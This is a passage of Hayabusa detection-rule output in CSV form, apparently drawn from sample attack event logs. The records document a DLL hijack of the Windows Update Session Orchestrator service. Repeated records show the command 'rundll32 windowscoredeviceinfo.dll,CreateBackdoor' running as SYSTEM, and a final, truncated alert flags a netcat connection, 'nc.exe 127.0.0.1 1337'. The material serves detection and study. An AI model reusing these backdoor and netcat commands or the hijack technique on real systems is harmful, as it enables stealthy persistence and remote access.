PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.187 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.189 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.192 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.195 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7420 | PGUID: 747F3D96-9F68-5E75-0000-0010B9662000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.205 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.209 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7420 | PGUID: 00000000-0000-0000-0000-000000000000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.213 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.215 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.218 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.221 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.224 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.230 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.232 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.234 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.242 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.247 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.250 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.255 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.388 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.392 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.401 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.421 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.425 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.434 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.440 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.443 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.451 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.459 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.463 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.485 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.486 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.499 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.513 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.542 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.548 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.569 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:39.226 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 3364 | PGUID: 747F3D96-9F77-5E75-0000-0010D2E62000 | Hash: 